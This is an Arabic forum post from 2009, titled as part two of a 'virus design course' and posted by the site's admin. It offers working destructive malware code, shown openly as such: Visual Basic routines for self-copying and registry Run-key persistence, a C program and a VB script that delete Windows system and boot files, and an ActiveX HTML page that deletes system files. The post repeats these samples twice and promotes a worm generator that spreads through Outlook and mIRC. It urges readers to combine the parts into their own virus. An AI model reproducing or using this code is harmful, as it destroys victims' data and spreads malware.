شبكة العراب ابن العرندس
في ظل المتاهات التي تخيم على الشبكات
نتمنى أن نكون طريقكم ألى ما ينفعكم
تسجيل صفحاتك المفضلة في مواقع خارجية

تسجيل صفحاتك المفضلة في مواقع خارجية digg  تسجيل صفحاتك المفضلة في مواقع خارجية delicious  تسجيل صفحاتك المفضلة في مواقع خارجية reddit  تسجيل صفحاتك المفضلة في مواقع خارجية stumbleupon  تسجيل صفحاتك المفضلة في مواقع خارجية slashdot  تسجيل صفحاتك المفضلة في مواقع خارجية yahoo  تسجيل صفحاتك المفضلة في مواقع خارجية google  تسجيل صفحاتك المفضلة في مواقع خارجية blogmarks  تسجيل صفحاتك المفضلة في مواقع خارجية live      

قم بحفض و مشاطرة الرابط شبكة العراب ابن العرندس على موقع حفض الصفحات

مواضيع ثابتة
اسماء الرياح وأنواعها _______________________________________ اسماء أيام الأسبوع في الجاهلية _______________________________________ سبب تسمية الاشهر الهجرية ----------------------------------- شبكة العراب الاخبارية al3rab news

دخول

لقد نسيت كلمة السر

ديسمبر 2017
الأحدالإثنينالثلاثاءالأربعاءالخميسالجمعةالسبت
     12
3456789
10111213141516
17181920212223
24252627282930
31      

اليومية اليومية


دورة في تصميم الفيروسات 2

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

default دورة في تصميم الفيروسات 2

مُساهمة من طرف العراب ابن العرندس في 2009-07-27, 6:45 pm

بسم الله الرحمن الرحيم
نكمل نوضوعنا السابق
Arrow Arrow Arrow Arrow Arrow Arrow


الخاصــــــــــــــية الأولى :-



On Error Resume Next

Dim copy, copy2

copy = "c:\virus.exe"

copy2 = "c:\windows\system\Project12.exe"

FileCopy copy, copy2



يعطى هذا الكود للفيروس خاصية نسخ نفسه الى مكان اخر حتى لا يمكن للضحيه
ايقافه بمجرد مسحه و يمكننا من التعامل مع الكود بكل بساطة هذا اذا كنت من
الفاهمين للكمبيوتر بدرجة جيدة و ليس للبرامج الصغيرة التى تاتى معه



الخاصــــــــــــــية الثانيه :-



Option Explicit



Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias
"RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String,
ByVal lpReserved As Long, lpType As Long, ByVal lpData As String,
lpcbData As Long) As Long

Private Declare Function RegCreateKey Lib "advapi32.dll" Alias
"RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String,
phkResult As Long) As Long

Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias
"RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String,
ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String,
ByVal cbData As Long) As Long

Private Declare Function RegOpenKey Lib "advapi32.dll" Alias
"RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult
As Long) As Long

Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias
"RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long

Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias
"RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As
Long



Private Const REG_SZ = 1

Private Const LOCALMACHINE = &H80000002





Private Sub Command1_Click()

Dim InputValue As String

Dim nBufferKey As Long, nBufferSubKey As Long





RegCreateKey LOCALMACHINE, "SOFTWARE\JPRODUCTIONS", nBufferKey

RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey

RegOpenKey nBufferKey, "Run-", nBufferSubKey

InputValue = "c:\windows\system\Project12.exe"

RegOpenKey LOCALMACHINE, "Software\Microsoft\Windows\CurrentVersion", nBufferKey

RegOpenKey nBufferKey, "Run-", nBufferSubKey

RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)



End Sub

يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتح الجهاز و هذا عن طريق تعديل ال registry :



هذا هو كل ما انا حصلت عليه من اكواد للفيروسات فلقد شرحت لكم مجموعه من
اكواد الفيروسات التى يمكننا من استخدامها و مجموعه من الأكواد التى
باضافتها للفيروس تعطى له خصائص مفيده و هذا ليس كل شئ فنا ان حصلت على ى
كود اخر فسوف اعطيه لكم فى هذا الموضوع و سوف اشرح فيه كل ما انا استطيع
لذا انتظروا منى المفيد و يتبقى لنى شئ بسيط وانهى هذا الجزء و هو مجموعة
اكواد لأشهر الفيروسات

فيرووس C++ :

*****************


#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\t**** -oO Israel Oo- and -oO America Oo-\n\n");
re****("c:\\windows\\system.ini");
re****("c:\\windows\\win.ini");
re****("c:\\autoexec.bat");
re****("c:\\msdos.sys");
re****("c:\\io.sys");
re****("c:\\command.com");
re****("c:\\config.sys");
re****("c:\\windows\\ebd\\command.com");
re****("c:\\windows\\ebd\\ebd.cab");
re****("c:\\windows\\ebd\\Autoexec.bat");
re****("c:\\windows\\ebd\\setramd.bat");
re****("c:\\windows\\ebd\\Findramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}




فيرووس Visual Basic :

*****************


SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"



فيروس Html



*****************


<html>

<head>
<$$$$ http$$$$$$="$$$$$$$-Type"
$$$$$$$="$$$$/html; charset=iso-8859-1">
<title>Active-X HTML</title>
</head>
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<body bgcolor="#000000" $$$$="#C0C0C0">
<$$$$$$ language="VB$$$$$$">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("$$$$$$ing.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("$$$$$$ing.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
</$$$$$$>
<!--- This $$$$$$ author is THEONE---!>
</body>
</html>



( ملاحظة يحفظ هذا الفيروس بأمتداد html .* )

يمكنك من دراسة هذه الأكواد و النظر فيها الى ما قد يفيدكم فيمكنكم من نقل بعض الأجزاء من الفيروسات السابقة عمل فيروس قوى يخصكم

هذا هو كل ما املك فى هذا الجزء و هو كما قلت لكم سابقا هو قابل للتطوير
فانتظروا منى الكثير من الأكواد التى سوف اضعها لكم ولاكن كرد على هذا
الموضوع [/size]


فيرووس C++ :

*****************


#include<stdio.h>
#include<conio.h>
#include<stdlib.h>
main()
{
clrscr();
printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n");
printf("\t\t**** -oO Israel Oo- and -oO America Oo-\n\n");
re****("c:\\windows\\system.ini");
re****("c:\\windows\\win.ini");
re****("c:\\autoexec.bat");
re****("c:\\msdos.sys");
re****("c:\\io.sys");
re****("c:\\command.com");
re****("c:\\config.sys");
re****("c:\\windows\\ebd\\command.com");
re****("c:\\windows\\ebd\\ebd.cab");
re****("c:\\windows\\ebd\\Autoexec.bat");
re****("c:\\windows\\ebd\\setramd.bat");
re****("c:\\windows\\ebd\\Findramd.exe");
rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe");
printf("Windows destroyed ...\n\n");
system("PAUSE");
}




فيرووس Visual Basic :

*****************


SetAttr "c:\autoexec.bat", vbNormal
SetAttr "c:\msdos.sys", vbNormal
SetAttr "c:\io.sys", vbNormal
SetAttr "c:\windows\win.ini", vbNormal
SetAttr "c:\windows\system.ini", vbNormal
SetAttr "c:\command.com", vbNormal
SetAttr "c:\config.sys", vbNormal
SetAttr "c:\windows\rundll.exe", vbNormal
SetAttr "c:\windows\rundll32.exe", vbNormal
Kill "C:\autoexec.bat"
Kill "C:\msdos.sys"
Kill "C:\io.sys"
Kill "C:\windows\win.ini"
Kill "C:\windows\system.ini"
Kill "C:\command.com"
Kill "C:\config.sys"
Kill "C:\windows\rundll.exe"
Kill "C:\windows\rundll32.exe"



فيروس Html



*****************


<html>

<head>
<$$$$ http$$$$$$="$$$$$$$-Type"
$$$$$$$="$$$$/html; charset=iso-8859-1">
<title>Active-X HTML</title>
</head>
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<body bgcolor="#000000" $$$$="#C0C0C0">
<$$$$$$ language="VB$$$$$$">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("$$$$$$ing.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("$$$$$$ing.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
</$$$$$$>
<!--- This $$$$$$ author is THEONE---!>
</body>
</html>



( ملاحظة يحفظ هذا الفيروس بأمتداد html .* )

يمكنك من دراسة هذه الأكواد و النظر فيها الى ما قد يفيدكم فيمكنكم من نقل بعض الأجزاء من الفيروسات السابقة عمل فيروس قوى يخصكم

هذا هو كل ما املك فى هذا الجزء و هو كما قلت لكم سابقا هو قابل للتطوير
فانتظروا منى الكثير من الأكواد التى سوف اضعها لكم ولاكن كرد على هذا
الموضوع

هذا هو الجزء الثانى من الفيروسات و هو اصغر الأجزاء نظرا لأنى سوف اضع فيه فكرة وليس طريقة شرح

و هو صنع فيروس بواسطة بعض البرامج الخاصة بذلك

هناك العديد من البرامج التى تؤدى ما انت تطمع قيه و بقوة ولاكن معظمها خطر جدا و يكتشفه مضاد الفيروس

ولاكن هناك برنامج وجت بعض المعلومات عنه وانا الأن اعد شرح مفصل و بالصور
عنه ولاكنى اخشى من ان يتضرر منه المبتدأين و ذلك لما سوف ترونه من مميزات
هذا البرنامج الخطيرة



هذا البرنامج لأنشاء فيروس من نظام worm او الدودة و هو برنامج vbswg2
الشهير و هذا البرنامج خطيييييييييييير جدااااااااااا لأنه به صمم فيروس
الحب ( I love u ) و فيروس آنا كرنوكوفا العارية و من اهم مميزات التى
تضاف الى الفيروس المصمم بهذا البرنامج انه يضرب outlook و يصيب الأميلات
و ينتشر من خلاله وهذا عن طريق انه يضرب القائمة البريدية للأميلات التى
تكون انت مضيفها لديك و يضرب كل الأميلات التى انت مضيفها و يواصل انتشاره
بهذه الطريقة



و من مميزات هذا البرنامج :

1- يحفظ لك الدودة بامتداد jpg - gih - txt - html والامتداد الرئيسي vbs
2- تضع فيه ميزة الإرسال عن طريق outlook واكيد الي يقرى الكلام فوق راح يعرف
3- اول ماتشغل Mirc راح يقوم على نشر نفسه
4- يمكن تدمجه مع احدى الملفات
5- يحذفلك جميع الملفات وهذا على حسب متطلباتك واستخدامك لخيارات البرنامج
6- الظاهر لحد هنا كافي لتسميته فيروس او دودة ويوجد فرق كبير بينهم لكن
المهم انه يدمر لك الجهاز ..... اكتشفوا المميزات الباقية بنفسكم



Download From




ملاحظه:

صاحب هذا البرنامج مايزال مسجون وهذا دليل على شدة وخطورة البرنامج



لكن الانتي فايرس يكتشفه بسهوله [/COLOR]


هذا الشرح ليس كافيا اليس كذلك اعلم ولاكنى لازلت
اتعلم استخدام هذا البرنامج و احاول اتقانه حتى لا اقوم بشرح شئ خطأ وانتم
كما تعرفون انه من الخطر جدا حدوث اى خطأ يمكن ان يؤدى الى كارثة

هذا هو نهاية الجزء الأول ولاكن يتبقى لنا الجزء الثالث و هو عن طريق صنع
فيروس بواسطة الفجول بيسك ولاكنى لم اكمله لذا انظروه منى قريبا

احب ان اوضح لكم جميعا شئ واحد وهو انى قد وضعت لكم هذه الطروق وليست هى
النهاية ولاكن يبقى لدى الكثير لأقدمه لكم فيما بعد و سوف اضعها لكم فى
هذا الموضوع كرد عليه لذا عليكم بمتابعة هذا الموضوع اول باول

اما الأن كل ما استطيع قوله لكم هو انى اتمنى لكم التوفيق دائما و اتمنى ان اكون قدمت لكم الجديد
منقول لأهميته الشديدة

تحياتي\\

لو طالت الايام
[/b]
avatar
العراب ابن العرندس
Admin
Admin

عدد الرسائل : 982
العراب ابن العرندس :
100 / 100100 / 100

عدد رسائل sms : 3
نقاط : 3424
تاريخ التسجيل : 08/02/2008

http://wasim.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى